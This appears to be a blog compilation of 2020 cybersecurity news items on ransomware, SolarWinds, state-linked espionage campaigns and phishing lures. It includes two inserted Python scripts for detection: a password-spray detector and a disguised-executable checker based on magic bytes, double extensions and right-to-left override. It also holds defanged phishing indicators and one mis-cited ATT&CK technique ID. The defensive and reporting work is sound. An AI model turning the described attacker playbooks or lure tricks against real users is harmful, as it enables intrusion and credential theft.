
Threat Actors Demand Ransom After Major Cyber Attack on Scottish Environmental Protection Agency

 

The Scottish Environment Protection Agency (SEPA) said its digital systems have been severely affected by a ransomware attack since Christmas Eve. The threat actors have locked the agency's emails and contact centres and are demanding a ransom to unlock them.

The National Cyber Security Centre and Police Scotland are investigating the incident, and an international cybercriminal group is believed to be behind the attack. Investigators have found that the threat actors stole nearly 1.2 GB of data, which suggests they may have accessed and stolen around 4,000 files.

SEPA said it will have to start from scratch and build an entirely new system following the ‘significant cyber-attack’. The agency further stated that essential services such as flood forecasting and warnings have not been hit by the attack. It remains highly unlikely, however, that its 1,300 employees will regain access to their old emails and online documents.

Scotland’s environmental regulator has described this as an “incredibly sophisticated attack” and warned that the threat actors will face the consequences. It said it is aware that the attackers are demanding a ransom to unlock the agency's systems, but that they will not succeed.

SEPA’s Chief Executive Terry A’Hearn stated that “whilst we don’t know and may never know the full detail of the 1.2 GB of information stolen, what we know is that early indications suggest that the theft of information related to several business areas, some of the information stolen will have been publicly available”.

The Conti ransomware group has claimed responsibility for the attack and has already leaked sensitive information on its site. The stolen information includes personal information about SEPA employees and information about commercial work with international partners.

Technology and Software Giants Microsoft and Google Face Threat from Chimera Gang Attacks

 


Microsoft and Google, the world's biggest technology and software companies, are being targeted by a group of cybercriminals going after their cloud services. Operating in line with Chinese interests, the threat actors are attacking a wide range of organizations with the intent of exfiltrating data.

Security researchers at NCC Group and Fox-IT, reporting on the incident, said that these attackers have a “wide set of interests”, with target data ranging from intellectual property belonging to victims in the semiconductor industry to passenger data from the airline industry.

The actors are tracked as Chimera by CyCraft. The group is not new to the industry: it has been linked to intrusions from 2019 through 2020, yet on each occasion it managed to avoid drawing much attention. “Our threat intelligence analysts noticed a clear overlap between the various cases in infrastructure and capabilities, and as a result we assess with moderate confidence that one group was carrying out the intrusions across multiple victims operating in Chinese interests”, added the team of researchers.

The researchers also outlined the attackers' playbook against such organizations. The actors start with usernames and passwords obtained from the victims’ previous data breaches and use them in credential stuffing or password spraying attacks against various remote services. Once they obtain a valid account, they use it to access the victim’s VPN, Citrix, or other remote service and thereby gain network access. Inside the network, the actors enumerate permissions and obtain a list of accounts with administrative privileges, then run password spraying against those accounts until another one is compromised. Finally, they use that account to load a Cobalt Strike beacon into memory, which is later used for remote access and command and control (C2).

Following the incident, the researchers affirmed that they have contained and eradicated the threat from their clients’ networks. They added that “NCC Group and Fox-IT aim to provide the wider community with information and intelligence that can be used to hunt for this threat in historic data and improve detections for intrusions by this intrusion set”.

Password Guessing Used as a Weapon by SolarWinds Hackers to Breach Targets

 

The Cybersecurity and Infrastructure Security Agency (CISA) reported that the perpetrators of the SolarWinds attack gained access to confidential information via common techniques such as password guessing, password spraying, and illicitly acquired administrative credentials usable through external remote access services.

The hackers tampered with a software update from the IT management company SolarWinds to gain unauthorized access to government systems. They inserted malware into an update the company distributed to thousands of its clients; once installed, it opened a command-and-control channel to an external server. Microsoft stated that the hackers’ primary aim was to gain access to cloud-hosted infrastructure, which in many instances meant the victims’ Azure and Microsoft 365 environments.

The threat actors behind the SolarWinds hack also gained access by password guessing [T1101.001] and password spraying [T1101.003], and did not consistently rely on the trojanized Orion app as their primary access vector.
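Both the Chimera write-up above and the CISA finding here describe password spraying against remote services. The following is an added example, not code from the page, NCC Group, Fox-IT or CISA: a small Python detector that separates a spray (one source with only one or two failures against each of many accounts) from a single user mistyping a password, and reports any later successful login from a flagged source, which is the valid account the attacker goes on to use. The log format, thresholds and sample lines are constructed for illustration.

```python
"""Password-spray detection over authentication logs (added example).

Not code from the page or the organisations it cites. Log format,
thresholds and sample lines are constructed for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: "<ISO timestamp> <source IP> <user> <outcome> <service>".
# 203.0.113.7 tries one password against many accounts (a spray) and later
# logs in as 'carol'; 198.51.100.9 is one user retrying a mistyped password.
SAMPLE_LOG = """\
2020-12-20T02:00:01Z 203.0.113.7 alice FAIL vpn
2020-12-20T02:00:04Z 203.0.113.7 bob FAIL vpn
2020-12-20T02:00:07Z 203.0.113.7 carol FAIL vpn
2020-12-20T02:00:10Z 203.0.113.7 dave FAIL vpn
2020-12-20T02:00:13Z 203.0.113.7 erin FAIL vpn
2020-12-20T02:00:16Z 203.0.113.7 frank FAIL vpn
2020-12-20T02:00:19Z 203.0.113.7 grace FAIL vpn
2020-12-20T02:00:22Z 203.0.113.7 heidi FAIL vpn
2020-12-20T02:01:05Z 198.51.100.9 ivan FAIL citrix
2020-12-20T02:01:20Z 198.51.100.9 ivan FAIL citrix
2020-12-20T02:01:40Z 198.51.100.9 ivan SUCCESS citrix
2020-12-20T02:45:00Z 203.0.113.7 carol SUCCESS vpn
"""


def parse_line(line):
    """Split one log line into a dict; raises ValueError on malformed input."""
    ts, ip, user, outcome, service = line.split()
    return {
        "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "ip": ip,
        "user": user,
        "outcome": outcome,
        "service": service,
    }


def detect_spray(log_text, window=timedelta(minutes=30), min_users=5, max_per_user=3):
    """Flag source IPs whose failures inside a sliding `window` span at least
    `min_users` distinct accounts with no more than `max_per_user` failures
    per account.

    A lone user retrying a forgotten password fails many times for ONE
    account; a spray fails once or twice for each of MANY accounts. Any
    SUCCESS from a flagged IP after the flag is reported as well, because
    that is the valid account the attacker moves on with.
    """
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["time"])
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        recent = deque()  # failures from this IP still inside the window
        for e in evs:
            if e["outcome"] == "FAIL":
                recent.append(e)
                while e["time"] - recent[0]["time"] > window:
                    recent.popleft()
                per_user = defaultdict(int)
                for r in recent:
                    per_user[r["user"]] += 1
                if ip in findings:
                    findings[ip]["users_sprayed"].add(e["user"])
                elif len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                    findings[ip] = {
                        "first_flagged": e["time"],
                        "users_sprayed": set(per_user),
                        "successes_after": [],
                    }
            elif e["outcome"] == "SUCCESS" and ip in findings:
                findings[ip]["successes_after"].append((e["user"], e["service"]))

    # Sorted lists make the output deterministic and easy to diff or alert on.
    return {ip: {**f, "users_sprayed": sorted(f["users_sprayed"])}
            for ip, f in findings.items()}


if __name__ == "__main__":
    for ip, finding in detect_spray(SAMPLE_LOG).items():
        print(ip, finding)
```

Tune `min_users` and `max_per_user` to the size of the directory being protected; a successful login reported under `successes_after` is the event worth paging on.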

CISA has urged United States government agencies to upgrade the SolarWinds Orion platform to the latest version, 2020.2.1HF2, and agencies that are unable to upgrade should take their Orion systems offline. The attackers modified several Orion app versions to embed malware, using a strain called Sunburst (or Solorigate) to corrupt the Orion updates for versions 2019.4 through 2020.1, which were released between March 2020 and June 2020.

“CISA has evidence that there are initial access vectors other than the SolarWinds Orion platform and has identified legitimate account abuse as one of these vectors (for details refer to Initial Access Vectors section), specifically, we are investigating incidents in which activity indicating abuse of Security Assertion Markup Language (SAML) tokens consistent with the adversary’s behavior is present, yet where impacted SolarWinds instances have not been identified” the agency stated.

The SolarWinds hack was first discovered by the US cybersecurity company FireEye, which on December 8th published a blog post revealing an attack on its own systems. The attack has impacted the highest authorities of the United States, including the Department of Homeland Security, the Department of Commerce, the US Treasury and parts of the Pentagon. The hackers are believed to be from Russia, based on several pieces of evidence; Russia has consistently denied the allegations.

Security Analysis: The Rise of Cybercrime Underworld and Hacking Groups

During the Covid-19 pandemic, educational institutions, health agencies, and other significant organizations have suffered the most from cyberattacks. On top of the massive wave of cyberattacks against these institutions, a new hacking group has emerged that uses modern techniques against its targets. The troubling part is that the group's operational structure is increasingly common in the hacking underworld. Known as "Egregor," the group has attacked more than 130 targets in recent months.

The victims include logistics companies, schools, health agencies, manufacturers, and financial firms. Egregor works like other ransomware: it holds the victim's data hostage until the ransom is paid. What sets it apart is that Egregor's methods reveal the present structure of the hacking economy. Instead of relying solely on lone-wolf hackers who orchestrate massive data breaches, or on dark web platforms crowded with Russian threat actors, today's hackers work as a loosely unified team that adopts innovations and changes in the hacking industry.

In other words, it is a replica of Silicon Valley, but one that thrives on extorting organizations for profit rather than building products. Cybersecurity expert Jason Passwaters, CEO of Intel 471, says that hackers who were active long ago are still in the game, offering the same services as before; the only change is that they now rely on each other rather than working alone. Experts suggest that as many as 12 hackers may be involved in a single data breach or commodity cyberattack. Egregor is not the only such group.

Hacking groups such as Thanos, Conti, and SunCrypt, which use similar malware strains, have also started operating cooperatively. Cyberscoop reports: "it’s a style with roots in the mid-2000s when a hacker using the name “slavik” released the Zeus malware, a hacking tool that helped accelerate what’s known now as an affiliate model. The FBI has identified a Russian man, Evgeniy Bogachev, as “slavik,” and has listed him on the bureau’s list of most wanted fugitives. Bogachev’s Zeus malware is responsible for financial losses of more than $100 million, the FBI says, even as the creator has posed in ostentatious outfits in social media pictures."

Check Point: What to expect from hackers in 2021

The pandemic has brought changes to all areas of modern life. Attackers have shifted their targets, choosing new priority areas, including a focus on the medical industry. Gil Shwed, founder and CEO of the information security company Check Point Software Technologies, described how hacker attacks have changed during the pandemic and what to expect from cybercrime in the future.

First, Gil Shwed suggested that since the coronavirus and the fight against it will continue to preoccupy humanity in 2021, pharmaceutical companies developing vaccines and medicines will most likely be attacked.

Second, while schoolchildren and students study from home, hackers will most likely take an interest in distance learning systems as well.

Third, botnets can be expected to be used increasingly in attacks. Hackers have already turned many existing malicious applications into botnets, creating entire armies of infected computers for cyber attacks.

Fourth, cyberwarfare is expected to reach a global level.

Mr. Shwed noted that attacks on hospitals and research laboratories, especially during the COVID-19 period, give attackers an opportunity to extract a ransom or gain attention.

The goals of cybercriminals who attack medical institutions vary: financial gain, causing harm, and gaining widespread publicity. For example, medical records sell on the dark web for up to $1,000 per record.

In addition, medical devices such as insulin injectors, heart monitors, and pacemakers can be targeted.  

Check Point researchers have demonstrated the ease with which an ultrasound machine running on an old Windows operating system can be hacked, revealing an entire database of patient images. Unsurprisingly, there has been a 75% increase in ransomware attacks on healthcare facilities in recent months.

Microsoft's researchers said that hackers from only three countries carried out 89% of nation-state cyberattacks this year. Attacks were extremely common, and their targets were events of various levels, from elections to the Olympic Games. The active use of deepfakes is also expected in 2021.

Earlier, E Hacking News reported that Russian hackers gained access to the source code of Microsoft programs and systems. The company stated that there is no reason to believe the hackers gained access to the services it uses to maintain its products or to customer data.

Russian hackers gained access to the source code of Microsoft programs and systems

Microsoft believes that the hackers who previously attacked US government departments and businesses have gained access to internal information about its software code.

Microsoft is among the clients of the US firm SolarWinds, whose systems were hacked earlier this year. On December 17, Microsoft representatives admitted that "malicious SolarWinds code was detected in its ecosystem, it was isolated and removed."

The company's specialists reported that "one account was used to view program code in a number of repositories."

As became known earlier, SolarWinds' Orion software was compromised in March of this year. The hackers managed to inject malware into an Orion update, which was then downloaded and used by thousands of SolarWinds customers, including leading government agencies and more than 400 major American companies.

In a joint statement released last week, the Office of the US Director of National Intelligence, the FBI and the Cybersecurity and Infrastructure Security Agency said they had documented a major attack on the federal government's computer networks.

US Secretary of State Michael Pompeo put forward the view that Russia was involved in the attack. Meanwhile, US President Donald Trump stressed that the media had exaggerated the scale of the incident.

Press Secretary of the Russian President Dmitry Peskov said that Moscow was not involved in hacker attacks on US government agencies and companies.

Experts agree that by raising the topic of cyber attacks, the new US administration is preparing the ground for another package of anti-Russian sanctions. This could take the form of sanctions or of a cyber attack, for example on key state institutions, says Konstantin Blokhin, a researcher at the Center for Security Research of the Russian Academy of Sciences. The fact that Trump did not blame Russia does not signal a change in Washington's foreign policy.

A similar point of view is expressed by the political scientist-Americanist Mikhail Sinelnikov-Orishak. "This is a great reason to accuse Moscow of interfering in internal affairs, to justify any measures, since it is impossible to determine exactly who is behind these attacks. In addition, this is a good justification for allocating additional funds from the budget for the cyberspace," said the political scientist.

Hackers Demand Ransom After Major Cyber-Attack on the Antwerp Laboratory


Algemeen Medisch Laboratorium bvba (AML), in the Antwerp district of Hoboken, was attacked by hackers; the laboratory processes about 3,000 Covid-19 tests daily, about 5% of the nation's total. Cyberattacks amid the coronavirus outbreak have increased sharply over the past year, and this attack is yet another addition to the wave of 'COVID-19'-themed malware and ransomware attacks.
 
The hackers deployed ransomware on the laboratory's website, bringing it to a standstill. As in past ransomware cases, the hackers are demanding a ransom before releasing the website.
 
ICT manager Maarten Vanheusden said that “after detailed analysis by our security teams, it was decided to disengage the network as a safety measure and by this way we can see what exactly is infected”. He also said that so far there is no indication of data being stolen and that all precautionary measures are being taken. The origins of the attack remain unknown for now, though traces link the hackers to China, Russia, and Iran.
 
AML is the country's largest private lab dealing with COVID-19 testing. The purpose of the attack is unclear; it cannot yet be determined whether the hackers attacked the laboratory merely for ransom or also intended data theft. The case is being handled by the federal Computer Crimes Unit after the lab reported the attack to the Antwerp prosecutor's office.
 
This is the second time in December that hackers have attacked organizations related to the Covid-19 pandemic. The European Medicines Agency (EMA), which is responsible for assessing and approving vaccines for the European Union, was targeted in a cyber-attack. German biotech firm BioNTech said that “the agency was attacked and some documents which were related to the regulatory submission for Pfizer and BioNTech’s Covid-19 vaccine had been unlawfully accessed”.
 
Hackers are targeting many healthcare and medical organizations, especially during the Covid-19 outbreak, both to demand ransom and to obtain confidential information related to vaccines.

Crypto Trading App Voyager Hit By Cyberattack, Company Shuts Down Website

 

Cryptocurrency brokerage platform Voyager halted operations on 28th December after a cyberattack disrupted its DNS configuration. Voyager Digital LLC is a cryptocurrency brokerage platform where investors can trade assets through the Voyager mobile app. The company has grown rapidly in 2020, increasing 40x in the last 12 months, and currently holds $200 million in assets under management. On 28th December, Voyager's online platform had to shut down; its press release stated that it was "currently undergoing maintenance."

The company later revealed that it had suffered a cyberattack, which led to the closing and cancelling of all limit orders. Steve Ehrlich, co-founder and CEO of Voyager, said in a press release that "customer funds and security are of the utmost importance to Voyager. Whilst all funds and crypto are secure we have had to temporarily halt trading on the platform and we sincerely apologize for the inconvenience and thank our clients for their patience."

The Voyager team had no trouble finding the intrusion; the moment it was detected, the team shut down the systems to protect client information and assets. Following the cyberattack, the Voyager app is back online and trading on the platform has returned to normal. As a security precaution, Voyager signed out all users from the app and advised them to change their login credentials and reset two-step verification (2FA). As of now, there is little detail about how the cyberattack happened beyond a tweet stating that it was a DNS attack.

"With a highly experienced team that has previously built successful online brokerages, we know the importance of having robust and highly secure systems to counter cyber attacks. With our rapid growth to date bringing the business into the spotlight, we are fully prepared for such events and in this case, have acted swiftly to prevent any impact on the business," says the Voyager press release.

Kaspersky has reported hacker attacks on COVID-19 researchers

The hacker group Lazarus attacked developers of a coronavirus vaccine: the Ministry of Health and a pharmaceutical company in one of the Asian countries

Kaspersky Lab reported that the hacker group Lazarus has launched two attacks on organizations involved in coronavirus research. The targets of the hackers, whose activity the company discovered, were the Ministry of Health of one of the Asian countries and a pharmaceutical company.

According to Kaspersky Lab, the first attack occurred on September 25. The hackers used the Bookcode malware, as well as phishing and compromised websites. A month later, on October 27, the Ministry of Health's servers running the Windows operating system were attacked; in that attack, according to the company, the wAgent malware was used. Lazarus previously used the same approach to infect the networks of cryptocurrency companies.

"Two Windows servers of a government agency were compromised on October 27 by a sophisticated malware known to Kaspersky Lab as wAgent. The infection was carried out in the same way that was previously used by the Lazarus group to penetrate the networks of cryptocurrency companies," said Kaspersky Lab.

Both types of malware allow attackers to gain control over an infected device. Kaspersky Lab continues its investigation.

"All companies involved in the development and implementation of the vaccine should be as ready as possible to repel cyber attacks," added Kaspersky Lab.

The Lazarus group is also known as APT38. The US Federal Bureau of Investigation (FBI) has reported that its activities are sponsored by the DPRK authorities.

Recall that in July, the National Cyber Security Centre (NCSC) and its counterparts in the United States and Canada accused the hacker group APT29, allegedly linked to the Russian special services, of attempting to steal information about the coronavirus vaccine. Dmitry Peskov, press secretary of the Russian President, denied the Kremlin's involvement in the intrusions.

SolarWinds Cyberattacks, Microsoft's Turn?

 

The United States is witnessing major cyberattacks: multiple government departments and agencies have been targeted, including the Treasury and Commerce departments and Homeland Security, and now Microsoft is the latest victim.

The ‘SolarWinds hack’ has emerged as one of the biggest cyberattacks against the US government, its agencies, and several private companies, so much so that it has been described as a global cyber attack.

According to Microsoft’s president, Brad Smith, more victims are expected to surface as investigations continue. 

Government departments and private organizations across the globe are struggling to remove the compromised SolarWinds products from their systems.

Intelligence agencies investigating the matter have named the hack ‘Sunburst’, saying that it will take years to fully understand these cyber-attacks, including the attack vectors and their origin. In this regard, Smith further stated, “We should all be prepared for stories about additional victims in the public sector and other enterprises and organizations.”

Furthermore, he said that Microsoft has already notified 40 of its customers who were found to be compromised. The malicious actors were seen targeting them “more precisely and breaching the security through additional and sophisticated measures". Experts predict the attacks will continue and that more victims are likely to come to light.

As per the researchers, approximately 80 percent of these customers were located in the United States, while others were from Mexico and Canada in North America, Spain, Belgium, and the United Kingdom in Europe, and UAE and Israel in the Middle East. 

Attackers have targeted the government agencies, security and other technology firms, and private organizations of the abovementioned nations. 

Above all, however, the campaign is “effectively an attack on the United States and its government and other critical institutions,” Smith warned. So far, six federal entities have been attacked: the Department of Energy, the Pentagon, the National Institutes of Health, the Department of Homeland Security, the Department of the Treasury, and the Department of Commerce.

The information about the attack has come from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) as the agency warned government and non-government agencies that there could be additional initial-access vectors, beyond the SolarWinds Orion platform. 

Sources cited by Reuters said that the malicious actors used Microsoft’s Azure cloud as part of their attacks; however, a Microsoft spokesperson denied this, saying that “there are no indications that our systems were used to attack others”.

Spear-Phishing Campaigns Targeting Tibet and Taiwan

 

The Tibetan community is being targeted by a spear-phishing campaign; the malicious actors behind it are suspected to be the same ones previously involved in campaigns against Taiwanese legislators, discovered in May 2020. Reportedly, the group is employing a novel malware variant called MESSAGEMANIFOLD, similar to the one used in the earlier campaigns, further solidifying the link between them.

Several other overlaps have been noted between the two campaigns, including the same email themes and the same hosting provider. Both campaigns also used Google Drive links to deliver the malware.

The attackers are going after strategic targets aligned with the Chinese government’s interests. The spear-phishing emails used a ‘conference invitations’ theme and contained a direct-download Google Drive link. According to the researchers, two Google Drive links were used, both delivering a file named “dalailama-Invitations[.]exe”.

About the Attacks

The dropped files use HTTP POST requests to communicate with the command and control server, which uses a fixed URL pattern, and the next-stage malware requires a specific response from it. The domains used in both campaigns were hosted on AS 42159 (Zemlyaniy Dmitro Leonidovich) and AS 42331 (PE Freehost).

Recent cyberattacks on Taiwanese and Tibetan entities come as no surprise: Beijing-based malicious actors have been observed actively attacking these targets in line with state interests. A recent IBM study disclosed an email phishing scheme attacking COVID-19 vaccine supply chains based in Germany and Italy; other targets included the Czech Republic and South Korea, among a few more.

Given the highly customized nature of the attacks against strategically chosen targets, the activity could be aligned with Chinese state-backed attackers; however, as of now the campaigns cannot be attributed to a known threat group. Experts therefore recommend using a trustworthy anti-malware solution, and users are advised to avoid opening attachments from unknown sources.

Russian embassy responds to Norwegian allegations of cyberattack

Hacker groups APT28 and Fancy Bear may have been involved in a cyber attack on the Norwegian Parliament in August 2020. This statement was made on Tuesday by the Norwegian Police Security Service.

Police say the operation was likely carried out by cyber groups publicly known as APT28 and Fancy Bear, which they say are connected with Russian military intelligence, the GRU, and more specifically with its main headquarters for special operations.

The Russian Embassy in Norway stated on Facebook on Tuesday that Norway's accusations against Russia of hacker attacks, made without providing evidence, are unacceptable and do not contribute to strengthening dialogue.

"Accusations without evidence in a highly likely regime are unacceptable. Unlike Norwegian politicians, Russia is careful to maintain a dialogue with Norway and even more cherish the centuries-old friendship and cooperation with the Norwegian people,” the embassy stressed.

"One more request to journalists and experts — if you comment on any statements of the special services, follow the professional code, namely: do not publish hastily the "hottest" news if you have no evidence," concluded the Embassy.

On September 1, the Parliament of the Kingdom reported that it had been subjected to a cyber attack in which unknown hackers gained access to the email of a number of deputies and employees of the legislative body. According to Marianne Andreassen, the administrative head of the Parliament, a number of immediate measures were taken to stop the attack. The Norwegian Police Security Service later said it would investigate whether "any state" was behind the cyber attack, which occurred on August 24.

Norwegian Foreign Minister Ine Eriksen Søreide made a statement that Russia was behind the cyber attack on parliament.

Spy Campaign: SideWinder APT Leverages South Asian Border Disputes


The SideWinder advanced persistent threat (APT) group, which appears to have been active since 2012, has started a new malicious campaign in which the threat actors leverage the rising border disputes between India and China, India and Nepal, and Nepal and Pakistan.

The aim of this phishing and malware campaign is to gather sensitive information from targets located mainly in two territories, Nepal and Afghanistan. A recent study says the SideWinder group primarily targets victims in South Asia and its surroundings, and this latest campaign is no exception.

According to the researchers, the campaign is targeting multiple government and military units in countries across the region. Its prime targets include the Nepali Ministries of Defense and Foreign Affairs, the Nepali Army, the Afghanistan National Security Council, the Sri Lankan Ministry of Defense, and the Presidential Palace in Afghanistan, to name a few.

The malicious actors are using fake webmail login pages to harvest credentials. According to the Trend Micro researchers, the real webmail login pages were copied from the victims and are now being used for phishing. For instance, “mail-nepalgovnp[.]duckdns[.]org” appears to be a legitimate Nepal government domain, but it merely tricks users into believing so.

The Catch

When users “log in”, they are either sent on to the actual login pages or redirected to various news pages or documents related to political topics or COVID-19. Researchers noted that some of the pages include articles titled “China has nothing to do with India, India should see that”. Many similar articles covering hot topics from the ongoing disputes between these states are being used.

Cyber Espionage: No Limits? 

"We also found multiple Android APK files on their phishing server. While some of them are benign, we also discovered malicious files created with Metasploit," the researchers wrote on Wednesday.

Reportedly, SideWinder is a very active group that made headlines for attacking mobile devices via a Binder exploit. This year, several states, including Bangladesh, China, and Pakistan, were attacked using coronavirus-themed files.


UAE Faces Cyber Pandemic, Cyberattacks In The Middle East On The Rise


The Middle East is suffering a "cyber pandemic" due to the rise in coronavirus-themed cyberattacks this year, says Mohamed al-Kuwaiti, the United Arab Emirates government's cybersecurity chief. As life moved fully online, the UAE saw an increase in cyberattacks, he adds; the country recorded a 250% increase in cyberattacks in 2020. The pandemic compelled companies across the globe to look inward and assess their assets, as criminal actors preyed on the digital world.

"Al Kuwaiti said discussions were ongoing regarding lifting the ban on some Voice over Internet Protocol (VoIP) services in the UAE, such as WhatsApp and FaceTime calling," reports CNBC. Al Kuwaiti says that the UAE became a primary target of attacks by activists when it recently established formal relations with Israel. Criminals targeted the health and financial sectors in particular. The news provides deeper insight into the troublesome cybersecurity challenges the UAE and the Middle East face: cyberattacks and breaches are flourishing in the region, most of them state-sponsored and undetected. According to Al Kuwaiti, various sources were behind the attacks; although they come from all over the region, the main actor is Iran, he says.

The issue reveals ongoing tension in the area, whereas Iran says that it is a target of cyberattacks. However, the Iranian foreign ministry has not offered any comments on the issue. Al Kuwaiti says that "phishing" and "ransomware" attacks are on the rise; these attacks have become more sophisticated and frequent. In a phishing attack, the hacker pretends to be a legitimate person or entity and steals sensitive information from the victim. Whereas in a ransomware attack, the hacker blocks access to information and demands a ransom from the victim. 

The latest research by cybersecurity firm TrendMicro says government IT infrastructures and critical public systems have become one of the primary targets of hackers globally, with ransomware attacks in the trend. According to the report, "current malicious actors have opted to demand heftier ransoms from targets that are more likely to pay, such as healthcare companies and local governments."

Russia was included in the list of countries with the most active hackers

Group-IB, a company that specializes in investigating cybercrime, has listed the countries from which cyberattacks are most often launched: China, Iran, North Korea, and Russia.

Hacker attacks are most often carried out from China, Iran, North Korea and Russia, according to Group-IB's Hi Tech Crime Trends 2020 report. The Asia-Pacific region was the most attacked in the second half of 2019 and the first half of 2020.

Hacker groups associated with state security services are mainly concentrated in China, where the report counts 23; Iran has 8, North Korea and Russia 4 each, India 3, Pakistan and the Gaza Strip 2 each, and Vietnam, Turkey and South Korea one each. Their main areas of interest are the Asia-Pacific region and Europe.

According to the report, Russia and the United States were attacked less often: 15 campaigns were conducted against the United States and 9 against Russia, by groups from China, North Korea and Iran. Russia also recorded one attack by Kazakhstan's security services, and the United States one each from the Gaza Strip and Pakistan.

Experts note that attacking teams are actively acquiring tools for attacks on physically isolated (air-gapped) networks; this year, incidents occurred at nuclear facilities in Iran and India.

Another high-profile attack was a sabotage attempt in Israel, where water supply systems were targeted and hackers tried to change the chlorine level.

Hackers attacked major Telegram channels via video on Yandex

On November 10, hackers carried out a major attack on popular Telegram channels. The administrators of the Reddit channel, which had 236 thousand subscribers, completely lost access to it. The attackers used an old scheme: they simply sent a Trojan-infected file to the administrators.

Hackers took over the Telegram channel of the Reddit forum; its administrators could no longer log in to the control panel. The Telegram channel Baza was also attacked, but the attackers failed to gain access to it.

The hackers' scheme was as follows: they offered to buy advertising space, but first asked the administrators to watch a video with their materials, which could be downloaded from Yandex.Disk. The file could not be opened on a mobile device, and the hackers suggested downloading it to a desktop computer instead.

After launching the file, the owner of the Reddit channel, with its 236 thousand subscribers, could no longer access it.

Artem Geller, General Director of the Studio.AG lab, explained that this is a very old fraud method and that such files target Windows. Under various pretexts, hackers send material containing malware, which gives them access to the entire operating system once the victim opens the file. In this case the attackers were interested in Telegram, so the Reddit channel's account was stolen.

Yandex.Disk cannot be blamed for missing the Trojan. According to Geller, about 300,000 new malware samples appear every day worldwide, so it is simply impossible to catch them all. Moreover, it may not be a new virus but a modification of an old one. And the Trojan's purpose is not to destroy the computer system.

Cloud storage is convenient for fraudsters because, unlike email, it lets them upload a file of any size. Unprotected, unencrypted files without passwords are uploaded to these stores.

Information security expert Alexander Vlasov notes that one thing must be remembered: those who provide a service for free never commit to protecting your files. Yes, they try to track malware, but only within the general framework of their ecosystem.
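The lure in this attack was a "video" that would not open on a phone and had to be run on a Windows desktop. That is the moment a simple check pays off: does the file's content match what its name claims? The script below is an added example for this post, not code from the article or from the people quoted in it. It compares the claimed extension with the file's leading bytes (magic numbers), flags Windows executable formats, double extensions such as `clip.mp4.exe` (Windows hides the final `.exe` by default) and the Unicode right-to-left override trick that reverses the visible extension. The sample files are constructed inline; the signature table is deliberately small.

```python
"""Does the 'video' you were asked to open on a desktop look like a video?

Added example, not code from the original post. Compares a file's claimed
extension with its actual magic bytes and flags executable content, double
extensions and right-to-left override characters. Samples are constructed.
"""
import os

# (offset, magic bytes, type). Real tools use libmagic; this table is just
# enough to tell a Windows executable from an MP4 or an archive.
SIGNATURES = [
    (0, b"MZ", "pe"),                  # EXE/DLL/SCR
    (4, b"ftyp", "mp4"),               # ISO base media file (MP4/MOV)
    (0, b"\x1a\x45\xdf\xa3", "mkv"),   # Matroska/WebM
    (0, b"PK\x03\x04", "zip"),         # ZIP, also Office/APK/JAR containers
    (0, b"%PDF-", "pdf"),
]
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".vbs", ".hta", ".lnk", ".msi"}
VIDEO_EXTS = {".mp4", ".mov", ".mkv", ".webm", ".avi"}
RTLO = "\u202e"  # right-to-left override: "clip\u202e4pm.scr" renders as "cliprcs.mp4"


def sniff(data: bytes) -> str:
    """Return the content type implied by the file's leading bytes."""
    for offset, magic, kind in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return kind
    return "unknown"


def classify(filename: str, data: bytes) -> dict:
    """Compare what the name claims with what the bytes say."""
    name = filename.lower()
    root, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(root)[1]       # "clip.mp4.exe" -> ".mp4"
    kind = sniff(data)
    reasons = []
    if RTLO in filename:
        reasons.append("right-to-left override in file name")
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {ext}")
    if inner_ext in VIDEO_EXTS and ext not in VIDEO_EXTS:
        reasons.append(f"double extension {inner_ext}{ext}")
    if ext in VIDEO_EXTS and kind not in ("mp4", "mkv", "unknown"):
        reasons.append(f"named as video but content is {kind}")
    if kind == "pe" and ext not in EXECUTABLE_EXTS:
        reasons.append("PE header under a non-executable name")
    return {"file": filename, "content": kind,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples: a plausible MP4 header and a minimal PE stub.
GOOD_MP4 = b"\x00\x00\x00\x18ftypmp42" + b"\x00" * 64
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
SAMPLES = [
    ("promo_clip.mp4", GOOD_MP4),          # what the "advertiser" claims to send
    ("promo_clip.mp4.exe", FAKE_PE),       # double extension, .exe hidden by Explorer
    ("promo_clip.mp4", FAKE_PE),           # executable content under a video name
    ("promo_clip" + RTLO + "4pm.scr", FAKE_PE),  # displays as promo_cliprcs.mp4
]


def scan(samples=SAMPLES) -> list:
    """Classify every (name, bytes) pair and return the verdicts in order."""
    return [classify(name, data) for name, data in samples]


if __name__ == "__main__":
    for verdict in scan():
        flag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{verdict['file']!r}: {flag} ({verdict['content']}) {verdict['reasons']}")
```

The check is cheap and catches exactly the trick used here: a file that "only opens on a desktop" is either not a video at all or is an executable wearing a video's name. It does not replace antivirus, but it does not depend on the sample being known, which is the gap Geller describes.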

Iranian Hacker Group Using New Tools to Target Government Agencies of Broader Middle East Region

 

As part of its attacks on companies and government agencies in the broader Middle East region, an Iranian cyberattack group has begun using new tools, including a custom downloader and commodity ransomware, according to Broadcom's Symantec division.

The group, dubbed Seedworm, appears to be deploying several variants of a new downloader, known as PowGoop, against recent targets.

The use of the malicious program does not indicate a shift to ransomware-based cybercrime for the group, but rather the adoption of a wider range of tactics for evading defensive measures.

The downloader retrieves and decrypts obfuscated PowerShell scripts and runs them on compromised systems, using this simple utility as a way to execute code.

The researchers also say the group is deploying ransomware known as Thanos, which first appeared for sale earlier this year and which Seedworm appears to use for its destructive capabilities.

"Looking at Seedworm's history, it is apparent they've been focused on Middle East-based government organizations for years," "We don't believe that they are directly focused on monetary gain. From our standpoint, the Thanos victim organizations [represent] very few [targets] — just a handful at the most," says Vikram Thakur, Symantec's technical director. 

The researchers were only moderately confident, however, in attributing PowGoop to the Iranian state actor.

